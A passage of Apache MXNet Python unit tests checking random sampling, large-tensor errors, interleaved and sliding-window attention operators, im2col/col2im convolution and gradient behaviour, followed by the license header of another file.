s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
high = 1
assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
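# (The two helpers above pack the per-head q/k/v projection rows and bias
# entries contiguously before flattening, which matches the interleaved
# parameter layout consumed by the interleaved_matmul_selfatt_* operators used
# below; a single FullyConnected can then emit the combined q/k/v projections
# in one pass.)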
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_device().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_device().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
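# Worked example: spatial=30, kernel=3, stride=2, dilate=2, pad=1 gives
# dilated_kernel = 2*(3-1)+1 = 5, pad_size = 30+2*1 = 32 and an output size of
# (32-5)//2 + 1 = 14, matching what mx.nd.Convolution produces below.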
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
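# (im2col unfolds every kernel-sized patch of the input into a column of length
# C*K*K, so the convolution reduces to a single matrix multiplication with the
# flattened filters; test_conv_compute checks this against mx.nd.Convolution.)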
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
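# (col2im scatters every unfolded value back to its source pixel and sums the
# overlaps, so col2im(im2col(x)) equals x scaled per pixel by the number of
# patches covering it -- which is exactly col2im(ones_like(col)) * x below.)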
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.prod(shape)
small_size = np.prod(small_shape)
big_size = np.prod(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.prod(shape)
small_size = np.prod(small_shape)
big_size = np.prod(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
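# (This builds the dense equivalent of the sliding-window attention pattern:
# query position i may attend to key positions j in [i - w*d, i + w*d] when
# symmetric, or in [i - w*d, i] otherwise, stepping by the dilation d -- the
# band that the sldwin_atten_* operators are expected to compute compactly.)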
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
# Must be done to prevent zero-sized dimension conversion to 'unknown'
prev_np_shape = mx.util.set_np_shape(True)
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
try:
seq_last()
seq_reverse()
seq_mask()
finally:
mx.util.set_np_shape(prev_np_shape)
@mx.util.use_np
def test_take_grads():
# Test for https://github.com/apache/incubator-mxnet/issues/19817
from mxnet.gluon.nn import HybridBlock, Conv1D, HybridSequential, HybridLambda, Dense
from mxnet import autograd, np as mx_np, npx as mx_npx
from mxnet.gluon.loss import L2Loss
def get_grads(model, grads, ctx=mx.cpu()):
pd = model.collect_params()
total_grad_l2 = 0
total_grad_l1 = 0
total_grad_linf = 0
for p in pd:
try:
g = pd[p].grad(ctx) / N
g2 = (g**2).sum().as_in_context(mx.cpu()).asscalar()
g1 = g.abs().sum().as_in_context(mx.cpu()).asscalar()
ginf = g.max().as_in_context(mx.cpu()).asscalar()
total_grad_linf = max(total_grad_linf, ginf)
total_grad_l2 += g2
total_grad_l1 += g1
except Exception:
pass
grads.append(total_grad_l1)
grads.append(total_grad_l2)
grads.append(total_grad_linf)
def run_model(model, loss, X, Y, num_iters=5):
grads = []
for _ in range(num_iters):
with autograd.record():
Y_hat = model(X)
ll = loss(Y_hat, Y)
ll = ll.sum()
ll.backward()
get_grads(model, grads)
return grads
def dense_layer():
den = HybridSequential()
den.add(Dense(10, flatten=True, activation='tanh'))
return den
class Model(HybridBlock):
def __init__(self, use_take=False, **kwargs):
super().__init__()
self.use_take = use_take
self.den = dense_layer()
def forward(self, X, axis=1):
X1 = self.den(X)
if self.use_take:
X2 = mx_np.take(X1, mx_np.array([0]), axis=axis)
else:
X2 = mx_npx.slice(X1.T, begin=0, end=1).T
return X2
N = 30
T = 20
C = 10
X = np.random.normal(size=(N, T, C))
Y = np.random.normal(size=(N, 1))
X, Y = mx_np.array(X), mx_np.array(Y)
seed = np.random.randint(1000)
# Using mx_np.take
mx.random.seed(seed)
model = Model(use_take=True)
model.initialize()
loss = L2Loss()
grads1 = run_model(model, loss, X, Y)
# Using mx_npx.slice
mx.random.seed(seed)
model2 = Model(use_take=False)
model2.initialize()
grads2 = run_model(model2, loss, X, Y)
for i in range(len(grads1)):
assert_almost_equal(grads1[i], grads2[i])
|
periodicrun.py
|
'''
MIT License
Copyright (c) 2016 Burak Kakillioğlu
